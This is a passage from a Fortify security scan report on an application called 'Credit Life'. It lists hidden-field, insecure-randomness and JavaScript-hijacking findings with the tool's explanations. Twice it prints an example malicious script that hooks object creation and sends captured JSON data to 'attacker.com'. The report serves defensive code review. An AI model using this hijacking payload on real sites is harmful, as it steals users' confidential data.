53 </div>
54 </div>
Oct 5, 2018, 5:40 PM 61

Hidden Field Low
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.assets.global.plugins.jquery-
minicolors
Low
jquery-minicolors/index.html, line 179 (Hidden Field)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/plugins/jquery-minicolors/index.html:179
Taint Flags:
177 <label for="hidden-input">Hidden Input</label>
178 <br>
179 <input type="hidden" id="hidden-input" class="demo" value="#db913d"> </div>
180 </div>
181 <div class="col-lg-4 col-sm-4 col-12">

Low
jquery-minicolors/without-bootstrap.html, line 106 (Hidden Field)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/plugins/jquery-minicolors/without-
bootstrap.html:106
Taint Flags:
104 <label for="hidden-input">Hidden Input</label>
105 <br>
106 <input type="hidden" id="hidden-input" class="demo" value="#db913d"> </div>
108 <label for="inline">Inline</label>
109 <br>

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Underwriting.Views.Assessment
PackageTmp/Areas/Underwriting/Views/Assessment/CalcPremiForm.cshtml, line Low
35 (Hidden Field)
Issue Details
Oct 5, 2018, 5:40 PM 62

Hidden Field Low
20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Underwriting.Views.Assessment
PackageTmp/Areas/Underwriting/Views/Assessment/CalcPremiForm.cshtml, line Low
35 (Hidden Field)
Sink Details
Views/Assessment/CalcPremiForm.cshtml:35
Taint Flags:
32 </div>
control col-md-1" />
36 </div>
37 </div>
Oct 5, 2018, 5:40 PM 63

Insecure Randomness (1 issue)
Abstract
Standard pseudorandom number generators cannot withstand cryptographic attacks.
Explanation
Insecure randomness errors occur when a function that can produce predictable values is used as a source
of randomness in a security-sensitive context.
Computers are deterministic machines, and as such are unable to produce true randomness.
Pseudorandom Number Generators (PRNGs) approximate randomness algorithmically, starting with a
seed from which subsequent values are calculated.
There are two types of PRNGs: statistical and cryptographic. Statistical PRNGs provide useful statistical
properties, but their output is highly predictable and form an easy to reproduce numeric stream that is
unsuitable for use in cases where security depends on generated values being unpredictable.
Cryptographic PRNGs address this problem by generating output that is more difficult to predict. For a
value to be cryptographically secure, it must be impossible or highly improbable for an attacker to
distinguish between the generated random value and a truly random value. In general, if a PRNG algorithm
is not advertised as being cryptographically secure, then it is probably a statistical PRNG and should not be
used in security-sensitive contexts, where its use can lead to serious vulnerabilities such as easy-to-guess
temporary passwords, predictable cryptographic keys, session hijacking, and DNS spoofing.
Example: The following code uses a statistical PRNG to create a URL for a receipt that remains active for
some period of time after a purchase.
function genReceiptURL (baseURL){

var randNum = Math.random();
var receiptURL = baseURL + randNum + ".html";
return receiptURL;
}
This code uses the Math.random() function to generate "unique" identifiers for the receipt pages it
generates. Since Math.random() is a statistical PRNG, it is easy for an attacker to guess the strings it
generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it
used a random number generator that did not produce predictable receipt identifiers, such as a
cryptographic PRNG.
Recommendation
When unpredictability is critical, as is the case with most security-sensitive uses of randomness, use a
cryptographic PRNG. Regardless of the PRNG you choose, always use a value with sufficient entropy to
seed the algorithm. (Values such as the current time offer only negligible entropy and should not be used.)
In JavaScript, the typical recommendation is to use the window.crypto.random() function in the

Mozilla API. However, this method does not work in many browsers, including more recent versions of
Mozilla Firefox. There is currently no cross-browser solution for a robust cryptographic PRNG. In the
meantime, consider handling any PRNG functionality outside of JavaScript.
Issue Summary
Oct 5, 2018, 5:40 PM 64

Engine Breakdown
Insecure Randomness 1 0 0 1
Total 1 0 0 1
Insecure Randomness High

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.assets.global.scripts
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/scripts/
High
app.min.js, line 1 (Insecure Randomness)
Issue Details
Kingdom: Security Features
Sink Details
Enclosing Method: getUniqueID()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/scripts/app.min.js:1
Taint Flags:
1 var App=function(){var t,e=!1,o=!1,a=!1,i=!1,n=[],l="../../assets/",s="global/
img/",r="global/plugins/",c="global/
css/",d={blue:"#89C4F4",red:"#F3565D",green:"#1bbc9b",purple:"#9b59b6",grey:"#95a5a6",yellow:"#F8CB00"},h
{"rtl"===$("body").css("direction")&&(e=!0),o=!!navigator.userAgent.match(/MSIE 8.0/),a=!!
navigator.userAgent.match(/MSIE 9.0/),i=!!navigator.userAgent.match(/MSIE 10.0/),i&&$
("html").addClass("ie10"),(i||a||o)&&$("html").addClass("ie")},p=function(){for(var
t=0;t<n.length;t++){var e=n[t];e.call()}},u=function(){var t;if(o){var e;$
(window).resize(function(){e!
=document.documentElement.clientHeight&&(t&&clearTimeout(t),t=setTimeout(function(){p()},
50),e=document.documentElement.clientHeight)})}else $(window).resize(function()
{t&&clearTimeout(t),t=setTimeout(function(){p()},50)})},f=function(){$
("body").on("click",".portlet > .portlet-title > .tools > a.remove",function(t)
{t.preventDefault();var e=$(this).closest(".portlet");$("body").hasClass("page-portlet-
fullscreen")&&$("body").removeClass("page-portlet-fullscreen"),e.find(".portlet-
title .fullscreen").tooltip("destroy"),e.find(".portlet-title > .tools
> .reload").tooltip("destroy"),e.find(".portlet-title > .tools
> .remove").tooltip("destroy"),e.find(".portlet-title > .tools
> .config").tooltip("destroy"),e.find(".portlet-title > .tools > .collapse, .portlet
> .portlet-title > .tools > .expand").tooltip("destroy"),e.remove()}),$
("body").on("click",".portlet > .portlet-title .fullscreen",function(t){t.preventDefault();var
e=$(this).closest(".portlet");if(e.hasClass("portlet-fullscreen"))$
(this).removeClass("on"),e.removeClass("portlet-fullscreen"),$("body").removeClass("page-
portlet-fullscreen"),e.children(".portlet-body").css("height","auto");else{var
o=App.getViewPort().height-e.children(".portlet-title").outerHeight()-
Oct 5, 2018, 5:40 PM 65

High
parseInt(e.children(".portlet-body").css("padding-top"))-parseInt(e.children(".portlet-
body").css("padding-bottom"));$(this).addClass("on"),e.addClass("portlet-fullscreen"),$
("body").addClass("page-portlet-fullscreen"),e.children(".portlet-body").css("height",o)}}),$
("body").on("click",".portlet > .portlet-title > .tools > a.reload",function(t)
{t.preventDefault();var e=$(this).closest(".portlet").children(".portlet-body"),o=$
(this).attr("data-url"),a=$(this).attr("data-error-display");o?(App.blockUI({target:e,animate:!
0,overlayColor:"none"}),$.ajax({type:"GET",cache:!1,url:o,dataType:"html",success:function(t)
{App.unblockUI(e),e.html(t),App.initAjax()},error:function(t,o,i){App.unblockUI(e);var
n="Error on reloading the content. Please check your connection and try
again.";"toastr"==a&&toastr?toastr.error(n):"notific8"==a&&$.notific8?($.notific8("zindex",
11500),$.notific8(n,{theme:"ruby",life:3e3})):alert(n)}})):(App.blockUI({target:e,animate:!
0,overlayColor:"none"}),window.setTimeout(function(){App.unblockUI(e)},1e3))}),$
('.portlet .portlet-title a.reload[data-load="true"]').click(),$("body").on("click",".portlet
> .portlet-title > .tools > .collapse, .portlet .portlet-title > .tools > .expand",function(t)
{t.preventDefault();var e=$(this).closest(".portlet").children(".portlet-body");$
(this).hasClass("collapse")?($
(this).removeClass("collapse").addClass("expand"),e.slideUp(200)):($
(this).removeClass("expand").addClass("collapse"),e.slideDown(200))})},b=function(){if($
().uniform){var t=$("input[type=checkbox]:not(.toggle, .md-check, .md-radiobtn, .make-
switch, .icheck), input[type=radio]:not(.toggle, .md-check, .md-radiobtn, .star, .make-
switch, .icheck)");t.size()>0&&t.each(function(){0===$(this).parents(".checker").size()&&($
(this).show(),$(this).uniform())})}},g=function(){if($("body").on("click",".md-checkbox >
label, .md-radio > label",function(){var t=$(this),e=$(this).children("span:first-
child");e.addClass("inc");var o=e.clone(!0);e.before(o),$("."+e.attr("class")
+":last",t).remove()}),$("body").hasClass("page-md")){var t,e,o,a,i;$
("body").on("click","a.btn, button.btn, input.btn, label.btn",function(n){t=$(this),
0==t.find(".md-click-circle").length&&t.prepend("<span class='md-click-circle'></
span>"),e=t.find(".md-click-circle"),e.removeClass("md-click-animate"),e.height()||e.width()||
(o=Math.max(t.outerWidth(),t.outerHeight()),e.css({height:o,width:o})),a=n.pageX-
t.offset().left-e.width()/2,i=n.pageY-t.offset().top-e.height()/2,e.css({top:i+"px",left:a
+"px"}).addClass("md-click-animate"),setTimeout(function(){e.remove()},1e3)})}var n=function(t)
{""!=t.val()?t.addClass("edited"):t.removeClass("edited")};$("body").on("keydown",".form-md-
floating-label .form-control",function(t){n($(this))}),$("body").on("blur",".form-md-floating-
label .form-control",function(t){n($(this))}),$(".form-md-floating-label .form-
control").each(function(){$(this).val().length>0&&$(this).addClass("edited")})},m=function(){$
().iCheck&&$(".icheck").each(function(){var t=$(this).attr("data-checkbox")?$(this).attr("data-
checkbox"):"icheckbox_minimal-grey",e=$(this).attr("data-radio")?$(this).attr("data-
radio"):"iradio_minimal-grey";t.indexOf("_line")>-1||e.indexOf("_line")>-1?$
(this).iCheck({checkboxClass:t,radioClass:e,insert:'<div class="icheck_line-icon"></div>'+$
(this).attr("data-label")}):$(this).iCheck({checkboxClass:t,radioClass:e})})},v=function(){$
().bootstrapSwitch&&$(".make-switch").bootstrapSwitch()},y=function(){$().confirmation&&$
("[data-toggle=confirmation]").confirmation({container:"body",btnOkClass:"btn btn-sm btn-
success",btnCancelClass:"btn btn-sm btn-danger"})},C=function(){$
("body").on("shown.bs.collapse",".accordion.scrollable",function(t){App.scrollTo($
(t.target))})},k=function(){if(location.hash){var t=encodeURI(location.hash.substr(1));$
('a[href="#'+t+'"]').parents(".tab-pane:hidden").each(function(){var t=$(this).attr("id");$
('a[href="#'+t+'"]').click()}),$('a[href="#'+t+'"]').click()}$().tabdrop&&$(".tabbable-
tabdrop .nav-pills, .tabbable-tabdrop .nav-tabs").tabdrop({text:'<i class="fa fa-ellipsis-v"></
i> <i class="fa fa-angle-down"></i>'})},x=function(){$
("body").on("hide.bs.modal",function(){$(".modal:visible").size()>1&&$("html").hasClass("modal-
open")===!1?$("html").addClass("modal-open"):$(".modal:visible").size()<=1&&$
("html").removeClass("modal-open")}),$("body").on("show.bs.modal",".modal",function(){$
(this).hasClass("modal-scroll")&&$("body").addClass("modal-open-noscroll")}),$
("body").on("hide.bs.modal",".modal",function(){$("body").removeClass("modal-open-noscroll")}),
$("body").on("hidden.bs.modal",".modal:not(.modal-cached)",function(){$
(this).removeData("bs.modal")})},w=function(){$(".tooltips").tooltip(),$(".portlet > .portlet-
title .fullscreen").tooltip({container:"body",title:"Fullscreen"}),$(".portlet > .portlet-
title > .tools > .reload").tooltip({container:"body",title:"Reload"}),$(".portlet > .portlet-
title > .tools > .remove").tooltip({container:"body",title:"Remove"}),$(".portlet > .portlet-
Oct 5, 2018, 5:40 PM 66

High
title > .tools > .config").tooltip({container:"body",title:"Settings"}),$(".portlet > .portlet-
title > .tools > .collapse, .portlet > .portlet-title > .tools
> .expand").tooltip({container:"body",title:"Collapse/Expand"})},I=function(){$
("body").on("click",".dropdown-menu.hold-on-click",function(t)
{t.stopPropagation()})},z=function(){$("body").on("click",'[data-close="alert"]',function(t){$
(this).parent(".alert").hide(),$(this).closest(".note").hide(),t.preventDefault()}),$
("body").on("click",'[data-close="note"]',function(t){$
(this).closest(".note").hide(),t.preventDefault()}),$("body").on("click",'[data-
remove="note"]',function(t){$
(this).closest(".note").remove(),t.preventDefault()})},A=function(){$('[data-
hover="dropdown"]').not(".hover-initialized").each(function(){$(this).dropdownHover(),$
(this).addClass("hover-initialized")})},S=function(){"function"==typeof
autosize&&autosize(document.querySelector("textarea.autosizeme"))},P=function(){$
(".popovers").popover(),$(document).on("click.bs.popover.data-api",function(e)
{t&&t.popover("hide")})},T=function(){App.initSlimScroll(".scroller")},U=function()
{jQuery.fancybox&&$(".fancybox-button").size()>0&&$(".fancybox-
button").fancybox({groupAttr:"data-rel",prevEffect:"none",nextEffect:"none",closeBtn:!
0,helpers:{title:{type:"inside"}}})},D=function(){$().counterUp&&$("[data-
counter='counterup']").counterUp({delay:10,time:1e3})},E=function(){(o||a)&&$
("input[placeholder]:not(.placeholder-no-fix), textarea[placeholder]:not(.placeholder-no-
fix)").each(function(){var t=$(this);""===t.val()&&""!
==t.attr("placeholder")&&t.addClass("placeholder").val(t.attr("placeholder")),t.focus(function()
{t.val()==t.attr("placeholder")&&t.val("")}),t.blur(function(){(""===t.val()||
t.val()==t.attr("placeholder"))&&t.val(t.attr("placeholder"))})})},G=function(){$
().select2&&($.fn.select2.defaults.set("theme","bootstrap"),$
(".select2me").select2({placeholder:"Select",width:"auto",allowClear:!0}))},H=function(){$
("[data-auto-height]").each(function(){var t=$(this),e=$("[data-height]",t),o=0,a=t.attr("data-
mode"),i=parseInt(t.attr("data-offset")?t.attr("data-offset"):0);e.each(function(){"height"==$
(this).attr("data-height")?$(this).css("height",""):$(this).css("min-height","");var t="base-
height"==a?$(this).outerHeight():$(this).outerHeight(!0);t>o&&(o=t)}),o+=i,e.each(function()
{"height"==$(this).attr("data-height")?$(this).css("height",o):$(this).css("min-
height",o)}),t.attr("data-related")&&$(t.attr("data-
related")).css("height",t.height())})};return{init:function()
{h(),u(),g(),b(),m(),v(),T(),U(),G(),f(),z(),I(),k(),w(),P(),C(),x(),y(),S(),D(),this.addResizeHandler(H)
{b(),m(),v(),A(),T(),G(),U(),I(),w(),P(),C(),y()},initComponents:function()
{this.initAjax()},setLastPopedPopover:function(e){t=e},addResizeHandler:function(t)
{n.push(t)},runResizeHandlers:function(){p()},scrollTo:function(t,e){var o=t&&t.size()>0?
t.offset().top:0;t&&($("body").hasClass("page-header-fixed")?o-=$(".page-header").height():$
("body").hasClass("page-header-top-fixed")?o-=$(".page-header-top").height():$
("body").hasClass("page-header-menu-fixed")&&(o-=$(".page-header-menu").height()),o+=e?
e:-1*t.height()),$("html,body").animate({scrollTop:o},"slow")},initSlimScroll:function(t){$
(t).each(function(){if(!$(this).attr("data-initialized")){var t;t=$(this).attr("data-height")?$
(this).attr("data-height"):$(this).css("height"),$(this).slimScroll({allowPageScroll:!
0,size:"7px",color:$(this).attr("data-handle-color")?$(this).attr("data-handle-
color"):"#bbb",wrapperClass:$(this).attr("data-wrapper-class")?$(this).attr("data-wrapper-
class"):"slimScrollDiv",railColor:$(this).attr("data-rail-color")?$(this).attr("data-rail-
color"):"#eaeaea",position:e?"left":"right",height:t,alwaysVisible:"1"==$(this).attr("data-
always-visible")?!0:!1,railVisible:"1"==$(this).attr("data-rail-visible")?!0:!
1,disableFadeOut:!0}),$(this).attr("data-initialized","1")}})},destroySlimScroll:function(t){$
(t).each(function(){if("1"===$(this).attr("data-initialized")){$(this).removeAttr("data-
initialized"),$(this).removeAttr("style");var t={};$(this).attr("data-handle-color")&&(t["data-
handle-color"]=$(this).attr("data-handle-color")),$(this).attr("data-wrapper-class")&&(t["data-
wrapper-class"]=$(this).attr("data-wrapper-class")),$(this).attr("data-rail-color")&&(t["data-
rail-color"]=$(this).attr("data-rail-color")),$(this).attr("data-always-visible")&&(t["data-
always-visible"]=$(this).attr("data-always-visible")),$(this).attr("data-rail-
visible")&&(t["data-rail-visible"]=$(this).attr("data-rail-visible")),$
(this).slimScroll({wrapperClass:$(this).attr("data-wrapper-class")?$(this).attr("data-wrapper-
class"):"slimScrollDiv",destroy:!0});var e=$(this);$.each(t,function(t,o)
{e.attr(t,o)})}})},scrollTop:function(){App.scrollTo()},blockUI:function(t){t=$.extend(!0,
Oct 5, 2018, 5:40 PM 67

High
{},t);var e="";if(e=t.animate?'<div class="loading-message '+(t.boxed?"loading-message-
boxed":"")+'"><div class="block-spinner-bar"><div class="bounce1"></div><div class="bounce2"></
div><div class="bounce3"></div></div></div>':t.iconOnly?'<div class="loading-message '+
(t.boxed?"loading-message-boxed":"")+'"><img src="'+this.getGlobalImgPath()+'loading-spinner-
grey.gif" align=""></div>':t.textOnly?'<div class="loading-message '+(t.boxed?"loading-message-
boxed":"")+'"><span>  '+(t.message?t.message:"LOADING...")+"</span></div>":'<div
class="loading-message '+(t.boxed?"loading-message-boxed":"")+'"><img
src="'+this.getGlobalImgPath()+'loading-spinner-grey.gif" align=""><span>  '+
(t.message?t.message:"LOADING...")+"</span></div>",t.target){var o=$(t.target);o.height()<=$
(window).height()&&(t.cenrerY=!0),o.block({message:e,baseZ:t.zIndex?t.zIndex:1e3,centerY:void
0!==t.cenrerY?t.cenrerY:!1,css:
{top:"10%",border:"0",padding:"0",backgroundColor:"none"},overlayCSS:
{backgroundColor:t.overlayColor?t.overlayColor:"#555",opacity:t.boxed?.05:.1,cursor:"wait"}})}
else $.blockUI({message:e,baseZ:t.zIndex?t.zIndex:1e3,css:
{border:"0",padding:"0",backgroundColor:"none"},overlayCSS:{backgroundColor:t.overlayColor?
t.overlayColor:"#555",opacity:t.boxed?.05:.1,cursor:"wait"}})},unblockUI:function(t){t?$
(t).unblock({onUnblock:function(){$(t).css("position",""),$(t).css("zoom","")}}):
$.unblockUI()},startPageLoading:function(t){t&&t.animate?($(".page-spinner-bar").remove(),$
("body").append('<div class="page-spinner-bar"><div class="bounce1"></div><div
class="bounce2"></div><div class="bounce3"></div></div>')):($(".page-loading").remove(),$
("body").append('<div class="page-loading"><img src="'+this.getGlobalImgPath()+'loading-
spinner-grey.gif"/>  <span>'+(t&&t.message?t.message:"Loading...")+"</span></
div>"))},stopPageLoading:function(){$(".page-loading, .page-spinner-
bar").remove()},alert:function(t){t=$.extend(!0,
{container:"",place:"append",type:"success",message:"",close:!0,reset:!0,focus:!
0,closeInSeconds:0,icon:""},t);var e=App.getUniqueID("App_alert"),o='<div id="'+e+'"
class="custom-alerts alert alert-'+t.type+' fade in">'+(t.close?'<button type="button"
class="close" data-dismiss="alert" aria-hidden="true"></button>':"")+(""!==t.icon?'<i
class="fa-lg fa fa-'+t.icon+'"></i> ':"")+t.message+"</div>";return t.reset&&$(".custom-
alerts").remove(),t.container?"append"==t.place?$(t.container).append(o):$
(t.container).prepend(o):1===$(".page-fixed-main-content").size()?$(".page-fixed-main-
content").prepend(o):($("body").hasClass("page-container-bg-solid")||$("body").hasClass("page-
content-white"))&&0===$(".page-head").size()?$(".page-title").after(o):$(".page-bar").size()>0?
$(".page-bar").after(o):$(".page-breadcrumb, .breadcrumbs").after(o),t.focus&&App.scrollTo($
("#"+e)),t.closeInSeconds>0&&setTimeout(function(){$("#"+e).remove()},
1e3*t.closeInSeconds),e},initUniform:function(t){t?$(t).each(function(){0===$
(this).parents(".checker").size()&&($(this).show(),$
(this).uniform())}):b()},updateUniform:function(t){$.uniform.update(t)},initFancybox:function()
{U()},getActualVal:function(t){return t=$
(t),t.val()===t.attr("placeholder")?"":t.val()},getURLParameter:function(t){var
e,o,a=window.location.search.substring(1),i=a.split("&");for(e=0;e<i.length;e+
+)if(o=i[e].split("="),o[0]==t)return unescape(o[1]);return null},isTouchDevice:function()
{try{return document.createEvent("TouchEvent"),!0}catch(t){return!1}},getViewPort:function()
{var t=window,e="inner";return"innerWidth"in window||(e="client",t=document.documentElement||
document.body),{width:t[e+"Width"],height:t[e+"Height"]}},getUniqueID:function(t)
{return"prefix_"+Math.floor(Math.random()*(new Date).getTime())},isIE8:function(){return
o},isIE9:function(){return a},isRTL:function(){return e},isAngularJsApp:function()
{return"undefined"==typeof angular?!1:!0},getAssetsPath:function(){return
l},setAssetsPath:function(t){l=t},setGlobalImgPath:function(t){s=t},getGlobalImgPath:function()
{return l+s},setGlobalPluginsPath:function(t){r=t},getGlobalPluginsPath:function(){return l
+r},getGlobalCssPath:function(){return l+c},getBrandColor:function(t){return d[t]?
d[t]:""},getResponsiveBreakpoint:function(t){var e={xs:480,sm:768,md:992,lg:1200};return e[t]?
e[t]:0}}}();jQuery(document).ready(function(){App.init()});
2
3 undefined
4 undefined
5 undefined
Oct 5, 2018, 5:40 PM 68

High
6 undefined
7 undefined
Oct 5, 2018, 5:40 PM 69

JavaScript Hijacking (1 issue)
Abstract
Applications that use JavaScript notation to transport sensitive data can be vulnerable to JavaScript
hijacking, which allows an unauthorized attacker to read confidential data from a vulnerable application.
Explanation
An application may be vulnerable to JavaScript hijacking if it: 1) Uses JavaScript objects as a data transfer
format 2) Handles confidential data. Because JavaScript hijacking vulnerabilities do not occur as a direct
result of a coding mistake, the Fortify Secure Coding Rulepacks call attention to potential JavaScript
hijacking vulnerabilities by identifying code that appears to generate JavaScript in an HTTP response.
Web browsers enforce the Same Origin Policy in order to protect users from malicious websites. The Same
Origin Policy requires that, in order for JavaScript to access the contents of a web page, both the
JavaScript and the web page must originate from the same domain. Without the Same Origin Policy, a
malicious website could serve up JavaScript that loads sensitive information from other websites using a
client's credentials, culls through it, and communicates it back to the attacker. JavaScript hijacking allows
an attacker to bypass the Same Origin Policy in the case that a web application uses JavaScript to
communicate confidential information. The loophole in the Same Origin Policy is that it allows JavaScript
from any website to be included and executed in the context of any other website. Even though a malicious
site cannot directly examine any data loaded from a vulnerable site on the client, it can still take advantage
of this loophole by setting up an environment that allows it to witness the execution of the JavaScript and
any relevant side effects it may have. Since many Web 2.0 applications use JavaScript as a data transport
mechanism, they are often vulnerable while traditional web applications are not.
The most popular format for communicating information in JavaScript is JavaScript Object Notation
(JSON). The JSON RFC defines JSON syntax to be a subset of JavaScript object literal syntax. JSON is
based on two types of data structures: arrays and objects. Any data transport format where messages can
be interpreted as one or more valid JavaScript statements is vulnerable to JavaScript hijacking. JSON
makes JavaScript hijacking easier by the fact that a JSON array stands on its own as a valid JavaScript
statement. Since arrays are a natural form for communicating lists, they are commonly used wherever an
application needs to communicate multiple values. Put another way, a JSON array is directly vulnerable to
JavaScript hijacking. A JSON object is only vulnerable if it is wrapped in some other JavaScript construct
that stands on its own as a valid JavaScript statement.
Example 1: The following example begins by showing a legitimate JSON interaction between the client
and server components of a web application used to manage sales leads. It goes on to show how an
attacker may mimic the client and gain access to the confidential data the server returns. Note that this
example is written for Mozilla-based browsers. Other mainstream browsers do not allow native constructors
to be overridden when an object is created without the use of the new operator.
The client requests data from a server and evaluates the result as JSON with the following code:
var object;
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
if (req.readyState == 4) {
var txt = req.responseText;
object = eval("(" + txt + ")");
req = null;
}
};
Oct 5, 2018, 5:40 PM 70

req.send(null);
When the code runs, it generates an HTTP request that looks like this:
GET /object.json HTTP/1.1

...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR
(In this HTTP response and the one that follows we have elided HTTP headers that are not directly relevant
to this explanation.)
The server responds with an array in JSON format:
HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/JavaScript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
"purchases":60000.00, "email":"brian@example.com" },
{"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
"purchases":120000.00, "email":"katrina@example.com" },
{"fname":"Jacob", "lname":"West", "phone":"6502135600",
"purchases":45000.00, "email":"jacob@example.com" }]
In this case, the JSON contains confidential information associated with the current user (a list of sales
leads). Other users cannot access this information without knowing the user's session identifier. (In most
modern web applications, the session identifier is stored as a cookie.) However, if a victim visits a malicious
website, the malicious site can retrieve the information using JavaScript hijacking. If a victim can be tricked
into visiting a web page that contains the following malicious code, the victim's lead information will be sent
to the attacker's web site.
<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
this.email setter = captureObject;
}
// Send the captured object back to the attacker's web site

function captureObject(x) {
var objString = "";
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
objString += "email: " + x;
req.open("GET", "http://attacker.com?obj=" +
escape(objString),true);
req.send(null);
Oct 5, 2018, 5:40 PM 71

}
</script>


<script src="http://www.example.com/object.json"></script>
The malicious code uses a script tag to include the JSON object in the current page. The web browser will
send up the appropriate session cookie with the request. In other words, this request will be handled just as
though it had originated from the legitimate application.
When the JSON array arrives on the client, it will be evaluated in the context of the malicious page. In order
to witness the evaluation of the JSON, the malicious page has redefined the JavaScript function used to
create new objects. In this way, the malicious code has inserted a hook that allows it to get access to the
creation of each object and transmit the object's contents back to the malicious site. Other attacks might
override the default constructor for arrays instead. Applications that are built to be used in a mashup
sometimes invoke a callback function at the end of each JavaScript message. The callback function is
meant to be defined by another application in the mashup. A callback function makes a JavaScript
hijacking attack a trivial affair -- all the attacker has to do is define the function. An application can be
mashup-friendly or it can be secure, but it cannot be both. If the user is not logged into the vulnerable site,
the attacker may compensate by asking the user to log in and then displaying the legitimate login page for
the application.
This is not a phishing attack -- the attacker does not gain access to the user's credentials -- so anti-
phishing countermeasures will not be able to defeat the attack. More complex attacks could make a series
of requests to the application by using JavaScript to dynamically generate script tags. This same technique
is sometimes used to create application mashups. The only difference is that, in this mashup scenario, one
of the applications involved is malicious.
Recommendation
All programs that communicate using JavaScript should take the following defensive measures: 1) Decline
malicious requests: Include a hard-to-guess identifier, such as the session identifier, as part of each
request that will return JavaScript. This defeats cross-site request forgery attacks by allowing the server to
validate the origin of the request. 2) Prevent direct execution of the JavaScript response: Include
characters in the response that prevent it from being successfully handed off to a JavaScript interpreter
without modification. This prevents an attacker from using a
Issue Summary
Oct 5, 2018, 5:40 PM 72

Engine Breakdown
JavaScript Hijacking 1 0 0 1
Total 1 0 0 1
JavaScript Hijacking Low

Low
respond.min.js, line 6 (JavaScript Hijacking)
Issue Details
Sink Details
Enclosing Method: v()
Taint Flags:
(document);
4
j.mp/respondjs */
Oct 5, 2018, 5:40 PM 73

JavaScript Hijacking Low
Low
respond.min.js, line 6 (JavaScript Hijacking)
7
8 undefined
9 undefined
Oct 5, 2018, 5:40 PM 74

JavaScript Hijacking: Vulnerable Framework (19 issues)
Abstract
Applications that use JavaScript notation to transport sensitive data can be vulnerable to JavaScript
hijacking, which allows an unauthorized attacker to read confidential data from a vulnerable application.
Explanation
An application may be vulnerable to JavaScript hijacking if it: 1) Uses JavaScript objects as a data transfer
format 2) Handles confidential data. Because JavaScript hijacking vulnerabilities do not occur as a direct
result of a coding mistake, the Fortify Secure Coding Rulepacks call attention to potential JavaScript
hijacking vulnerabilities by identifying code that appears to generate JavaScript in an HTTP response.
Web browsers enforce the Same Origin Policy in order to protect users from malicious websites. The Same
Origin Policy requires that, in order for JavaScript to access the contents of a web page, both the
JavaScript and the web page must originate from the same domain. Without the Same Origin Policy, a
malicious website could serve up JavaScript that loads sensitive information from other websites using a
client's credentials, culls through it, and communicates it back to the attacker. JavaScript hijacking allows
an attacker to bypass the Same Origin Policy in the case that a web application uses JavaScript to
communicate confidential information. The loophole in the Same Origin Policy is that it allows JavaScript
from any website to be included and executed in the context of any other website. Even though a malicious
site cannot directly examine any data loaded from a vulnerable site on the client, it can still take advantage
of this loophole by setting up an environment that allows it to witness the execution of the JavaScript and
any relevant side effects it may have. Since many Web 2.0 applications use JavaScript as a data transport
mechanism, they are often vulnerable while traditional web applications are not.
The most popular format for communicating information in JavaScript is JavaScript Object Notation
(JSON). The JSON RFC defines JSON syntax to be a subset of JavaScript object literal syntax. JSON is
based on two types of data structures: arrays and objects. Any data transport format where messages can
be interpreted as one or more valid JavaScript statements is vulnerable to JavaScript hijacking. JSON
makes JavaScript hijacking easier by the fact that a JSON array stands on its own as a valid JavaScript
statement. Since arrays are a natural form for communicating lists, they are commonly used wherever an
application needs to communicate multiple values. Put another way, a JSON array is directly vulnerable to
JavaScript hijacking. A JSON object is only vulnerable if it is wrapped in some other JavaScript construct
that stands on its own as a valid JavaScript statement.
Example 1: The following example begins by showing a legitimate JSON interaction between the client
and server components of a web application used to manage sales leads. It goes on to show how an
attacker may mimic the client and gain access to the confidential data the server returns. Note that this
example is written for Mozilla-based browsers. Other mainstream browsers do not allow native constructors
to be overridden when an object is created without the use of the new operator.
The client requests data from a server and evaluates the result as JSON with the following code:
var object;
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
if (req.readyState == 4) {
var txt = req.responseText;
object = eval("(" + txt + ")");
req = null;
}
Oct 5, 2018, 5:40 PM 75

};
req.send(null);
When the code runs, it generates an HTTP request that looks like this:
GET /object.json HTTP/1.1

...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR
(In this HTTP response and the one that follows we have elided HTTP headers that are not directly relevant
to this explanation.)
The server responds with an array in JSON format:
HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/JavaScript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
"purchases":60000.00, "email":"brian@example.com" },
{"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
"purchases":120000.00, "email":"katrina@example.com" },
{"fname":"Jacob", "lname":"West", "phone":"6502135600",
"purchases":45000.00, "email":"jacob@example.com" }]
In this case, the JSON contains confidential information associated with the current user (a list of sales
leads). Other users cannot access this information without knowing the user's session identifier. (In most
modern web applications, the session identifier is stored as a cookie.) However, if a victim visits a malicious
website, the malicious site can retrieve the information using JavaScript hijacking. If a victim can be tricked
into visiting a web page that contains the following malicious code, the victim's lead information will be sent
to the attacker's web site.
<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
this.email setter = captureObject;
}
// Send the captured object back to the attacker's web site

function captureObject(x) {
var objString = "";
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
objString += "email: " + x;
req.open("GET", "http://attacker.com?obj=" +
escape(objString),true);
Oct 5, 2018, 5:40 PM 76

req.send(null);
}
</script>


<script src="http://www.example.com/object.json"></script>
The malicious code uses a script tag to include the JSON object in the current page. The web browser will
